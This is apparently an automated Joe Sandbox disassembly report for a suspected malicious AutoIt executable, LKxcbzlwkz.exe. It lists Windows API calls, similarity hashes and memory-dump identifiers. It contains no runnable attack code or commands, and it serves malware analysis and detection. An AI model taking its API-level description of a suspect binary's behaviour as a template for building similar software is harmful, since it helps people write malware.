                                                                                                                                                                                                                                                            • API ID: MessageSend_mallocwsprintf
                                                                                                                                                                                                                                                            • String ID: %d/%02d/%02d
                                                                                                                                                                                                                                                            • API String ID: 1262938277-328681919
                                                                                                                                                                                                                                                            • Opcode ID: 0791508f4d5d4d8a4d88f52051df625728301e413c657ab928a68c4181838543
                                                                                                                                                                                                                                                            • Instruction ID: 953f6dd97ce98099cbba652085d0304866be84a46252058ffc4865c1a62d2123
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0791508f4d5d4d8a4d88f52051df625728301e413c657ab928a68c4181838543
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9DF0823274022866D7109BD9AD42FBEB3A8DB49762F00416BFE08E9180E6694854C3B9
APIs
• InternetCloseHandle.WININET(?), ref: 00442663
• InternetCloseHandle.WININET ref: 00442668
  • Part of subcall function 004319AC: WaitForSingleObject.KERNEL32(aeB,?,?,00442688,aeB,00002710,?,?,00426561,?,?,0040F19D), ref: 004319BD
Strings
Memory Dump Source
• Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
Similarity
• API ID: CloseHandleInternet$ObjectSingleWait
• String ID: aeB
• API String ID: 857135153-906807131
• Opcode ID: c8224cb77d174d98af0e1b6511dcd9cd22ae279780c4dc09588970c0e039578a
• Instruction ID: 0fa74210230a71b56b5a48e3a0e63043fcf8dca502afcbd281d0c2380f7acdeb
• Opcode Fuzzy Hash: c8224cb77d174d98af0e1b6511dcd9cd22ae279780c4dc09588970c0e039578a
• Instruction Fuzzy Hash: 46E0E67650071467D310AF9ADC00B4BF7DC9F95724F11482FEA4497650C6B5B4408BA4
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
Similarity
• API ID: _wcsncpy
• String ID: ^B$C:\Users\user\Desktop\LKxcbzlwkz.exe
• API String ID: 1735881322-1437754140
• Opcode ID: f7c3fd886c497ae33bdd3057849675e3afdb83c7c480df0bc310b3c11edf5eb4
• Instruction ID: 95fca152a805ab331260cabc3645652019b64b11bc5d0d7a1f408bc65d2df1f2
• Opcode Fuzzy Hash: f7c3fd886c497ae33bdd3057849675e3afdb83c7c480df0bc310b3c11edf5eb4
• Instruction Fuzzy Hash: ADE0C23360051A7B9710DE4AD841DBBF37DEEC4A20B08802AF90883200E2B1BD1A43E4
APIs
• FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00441BFE
• PostMessageW.USER32(00000000), ref: 00441C05
  • Part of subcall function 004331A2: Sleep.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331B9
Strings
Memory Dump Source
• Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
Similarity
• API ID: FindMessagePostSleepWindow
• String ID: Shell_TrayWnd
• API String ID: 529655941-2988720461
• Opcode ID: 45e518b183cc50fc9cae19d0f51122c68363ee0c98c893ad2541c3bd761d7025
• Instruction ID: aba4e04af0122a293c2d26b46e7c49f9db856b5fc79b6d6ac13cebee95b63d36
• Opcode Fuzzy Hash: 45e518b183cc50fc9cae19d0f51122c68363ee0c98c893ad2541c3bd761d7025
• Instruction Fuzzy Hash: EFD0A772BC13013BFA6077745D0FF8B66145B14711F000C3A7B42E61C1D4F8E4018758
APIs
• FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00441C2A
• PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 00441C3D
  • Part of subcall function 004331A2: Sleep.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331B9
Strings
Memory Dump Source
• Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: FindMessagePostSleepWindow
                                                                                                                                                                                                                                                            • String ID: Shell_TrayWnd
                                                                                                                                                                                                                                                            • API String ID: 529655941-2988720461
                                                                                                                                                                                                                                                            • Opcode ID: 2c92ce268d6dea70ed1d9c93ac972332f86dd545b3a9023bb22b3be85c6f7e29
                                                                                                                                                                                                                                                            • Instruction ID: e91d5bd0f3095d95abf168919443ed1e5ef8457e9bc9ee6dadeb2d3358a759b2
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 2c92ce268d6dea70ed1d9c93ac972332f86dd545b3a9023bb22b3be85c6f7e29
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 61D0A772B843017BFA6077745D0FF8B66145B14711F000C3A7B46A61C1D4F8D4018758
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 004370D1
                                                                                                                                                                                                                                                              • Part of subcall function 004118DA: _doexit.LIBCMT ref: 004118E6
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Message_doexit
                                                                                                                                                                                                                                                            • String ID: AutoIt$Error allocating memory.
                                                                                                                                                                                                                                                            • API String ID: 1993061046-4017498283
                                                                                                                                                                                                                                                            • Opcode ID: a805162a0f5c9c87f8277766c6d2ca4cce7c6123580b1b409358537ccd51af94
                                                                                                                                                                                                                                                            • Instruction ID: aa36ec6b1cc278624b5c670a1a0522bf80bf1016c56dd6686bcadf549e8ac499
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a805162a0f5c9c87f8277766c6d2ca4cce7c6123580b1b409358537ccd51af94
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: F1B092323C030627E50437910D0BF9D26003B64F02F220C067324280D204C90090131D